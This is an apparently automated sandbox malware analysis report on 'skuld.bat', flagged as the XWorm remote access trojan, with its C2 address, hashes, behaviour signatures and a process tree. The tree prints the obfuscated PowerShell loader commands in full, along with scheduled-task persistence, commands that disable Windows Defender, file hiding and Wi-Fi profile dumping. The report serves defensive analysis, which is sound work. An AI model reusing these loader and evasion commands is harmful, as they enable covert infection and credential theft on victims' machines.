Analysis

  • max time kernel
    104s
  • max time network
    101s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    29-06-2024 05:20

General

  • Target

    skuld.bat

  • Size

    26.0MB

  • MD5

    b6043c62279ba9658cb83d9a25e5a23b

  • SHA1

    f707fc5bb01d16e151fe115dccc730819a81da88

  • SHA256

    edd80a73c65730613d5eda3a78a5a79d7acf9c93b054882ff0f57f0cddfae36c

  • SHA512

    273c82e5f1a80d810874fcea5e03527bf0fe39663a875444ae15194a535b5ba37340193074abcb7534a17d0a99e52b77029a7a659505f488ec8717db54db7d69

  • SSDEEP

    49152:Mh3gBzuxsw5ZfN2roFEHsPlg2pTVDOlNtcU62VVQ4OnlDmhJaER7dZ0bGm47Nb9T:Me

Malware Config

Extracted

Family

xworm

Version

5.0

C2

amount-socket.gl.at.ply.gg:29643

Mutex

CBOJbsqFCwukBOQm

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • GoLang User-Agent 1 IoCs

    Uses the default user-agent string defined by the Go HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:792
    • C:\Windows\system32\DllHost.exe
      C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
      2⤵
        PID:4024
      • C:\Windows\system32\BackgroundTaskHost.exe
        "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
        2⤵
          PID:3576
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
          2⤵
            PID:1232
          • C:\Windows\system32\BackgroundTaskHost.exe
            "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
            2⤵
              PID:3324
            • C:\Windows\system32\backgroundTaskHost.exe
              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
              2⤵
                PID:2724
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                2⤵
                  PID:3284
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                  2⤵
                    PID:2376
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                    2⤵
                    • Modifies Internet Explorer settings
                    • Modifies registry class
                    PID:3604
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k RPCSS -p
                  1⤵
                    PID:904
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                    1⤵
                      PID:960
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                      1⤵
                        PID:392
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                        1⤵
                          PID:516
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                          1⤵
                            PID:756
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            1⤵
                              PID:1076
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                              1⤵
                                PID:1084
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                  PID:1204
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1220
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                  1⤵
                                    PID:1280
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1296
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                      1⤵
                                        PID:1404
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1428
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1528
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                            1⤵
                                              PID:1564
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              1⤵
                                                PID:1572
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1688
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  1⤵
                                                    PID:1712
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                    1⤵
                                                      PID:1756
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      1⤵
                                                        PID:1812
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1820
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:1940
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1948
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:1976
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:1448
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                  1⤵
                                                                    PID:2164
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2220
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2292
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:2380
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2508
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                            1⤵
                                                                              PID:2512
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2676
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                1⤵
                                                                                • Drops file in System32 directory
                                                                                PID:2760
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                1⤵
                                                                                  PID:2844
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2896
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2908
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                      1⤵
                                                                                        PID:3020
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3556
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:3588
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\skuld.bat"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3756
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9HW8+LZ7W8Iu3u/y2KrXmy8AoR48YEg4UVvE8kTk/+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3WrT9EO2jZTElsL/+FG+Ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oCVli=New-Object System.IO.MemoryStream(,$param_var); $LCoEj=New-Object System.IO.MemoryStream; $umAPC=New-Object System.IO.Compression.GZipStream($oCVli, [IO.Compression.CompressionMode]::Decompress); $umAPC.CopyTo($LCoEj); $umAPC.Dispose(); $oCVli.Dispose(); $LCoEj.Dispose(); $LCoEj.ToArray();}function execute_function($param_var,$param2_var){ $tcHJz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ndESF=$tcHJz.EntryPoint; $ndESF.Invoke($null, $param2_var);}$rXqmw = 'C:\Users\Admin\AppData\Local\Temp\skuld.bat';$host.UI.RawUI.WindowTitle = $rXqmw;$daRKi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rXqmw).Split([Environment]::NewLine);foreach ($cjVQB in $daRKi) { if ($cjVQB.StartsWith('FWhwVisqZfAwLTGwgtXB')) { $EMjoX=$cjVQB.Substring(20); break; }}$payloads_var=[string[]]$EMjoX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                              3⤵
                                                                                                PID:3792
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3316
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_870_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                  4⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3304
                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.vbs"
                                                                                                  4⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4068
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.bat" "
                                                                                                    5⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:368
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9HW8+LZ7W8Iu3u/y2KrXmy8AoR48YEg4UVvE8kTk/+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3WrT9EO2jZTElsL/+FG+Ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oCVli=New-Object System.IO.MemoryStream(,$param_var); $LCoEj=New-Object System.IO.MemoryStream; $umAPC=New-Object System.IO.Compression.GZipStream($oCVli, [IO.Compression.CompressionMode]::Decompress); $umAPC.CopyTo($LCoEj); $umAPC.Dispose(); $oCVli.Dispose(); $LCoEj.Dispose(); $LCoEj.ToArray();}function execute_function($param_var,$param2_var){ $tcHJz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ndESF=$tcHJz.EntryPoint; $ndESF.Invoke($null, $param2_var);}$rXqmw = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.bat';$host.UI.RawUI.WindowTitle = $rXqmw;$daRKi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rXqmw).Split([Environment]::NewLine);foreach ($cjVQB in $daRKi) { if ($cjVQB.StartsWith('FWhwVisqZfAwLTGwgtXB')) { $EMjoX=$cjVQB.Substring(20); break; }}$payloads_var=[string[]]$EMjoX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                      6⤵
                                                                                                        PID:2940
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                        6⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in Drivers directory
                                                                                                        • Deletes itself
                                                                                                        • Adds Run key to start application
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3500
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xworm.bat" "
                                                                                                          7⤵
                                                                                                            PID:2828
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Local\Temp\xworm.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                              8⤵
                                                                                                                PID:1180
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                8⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4728
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_927_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_927.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                                  9⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:3456
                                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_927.vbs"
                                                                                                                  9⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  PID:3624
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_927.bat" "
                                                                                                                    10⤵
                                                                                                                      PID:3836
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Roaming\Windows_Log_927.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                                        11⤵
                                                                                                                          PID:788
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                          11⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:4168
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          7⤵
                          • Drops file in System32 directory
                          • Views/modifies file attributes
                          PID:3776
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\skuld.bat" "
                          7⤵
                          PID:4696
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tLPLnyvWPaphEmS37XPXScEiOy5ov6wE/scYj+jBN08='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u2XafaOdagMZual482GQjg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $obFyo=New-Object System.IO.MemoryStream(,$param_var); $BaZuf=New-Object System.IO.MemoryStream; $Cjcmb=New-Object System.IO.Compression.GZipStream($obFyo, [IO.Compression.CompressionMode]::Decompress); $Cjcmb.CopyTo($BaZuf); $Cjcmb.Dispose(); $obFyo.Dispose(); $BaZuf.Dispose(); $BaZuf.ToArray();}function execute_function($param_var,$param2_var){ $rDWom=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PpMYM=$rDWom.EntryPoint; $PpMYM.Invoke($null, $param2_var);}$TZbQs = 'C:\Users\Admin\AppData\Local\Temp\skuld.bat';$host.UI.RawUI.WindowTitle = $TZbQs;$mutAf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($TZbQs).Split([Environment]::NewLine);foreach ($NZkFA in $mutAf) { if ($NZkFA.StartsWith('YSPTlJoJeJoEhZxsRksZ')) { $HqLRD=$NZkFA.Substring(20); break; }}$payloads_var=[string[]]$HqLRD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                              8⤵
                              PID:3776
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                              8⤵
                              PID:4508
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3280
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                          7⤵
                          • Views/modifies file attributes
                          PID:4340
                        • C:\Windows\System32\Wbem\wmic.exe
                          wmic os get Caption
                          7⤵
                          PID:3304
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                          7⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3316
                        • C:\Windows\System32\Wbem\wmic.exe
                          wmic cpu get Name
                          7⤵
                          PID:4636
                        • C:\Windows\System32\Wbem\wmic.exe
                          wmic path win32_VideoController get name
                          7⤵
                          • Detects videocard installed
                          PID:2012
                        • C:\Windows\System32\Wbem\wmic.exe
                          wmic csproduct get UUID
                          7⤵
                          PID:5076
                        • C:\Windows\system32\attrib.exe
                          attrib -r C:\Windows\System32\drivers\etc\hosts
                          7⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:400
                        • C:\Windows\system32\attrib.exe
                          attrib +r C:\Windows\System32\drivers\etc\hosts
                          7⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:3792
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          7⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:4464
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
